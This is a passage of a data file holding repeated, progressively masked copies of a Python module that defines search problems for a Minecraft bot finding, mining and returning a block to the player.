_get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass FindProblem(SearchProblem):\n <docstring token>\n <function token>\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass FindProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass FindProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n <function token>\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass FindProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n <function token>\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n <function token>\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n <function token>\n <function token>\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n <function token>\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n <function token>\n <function token>\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = 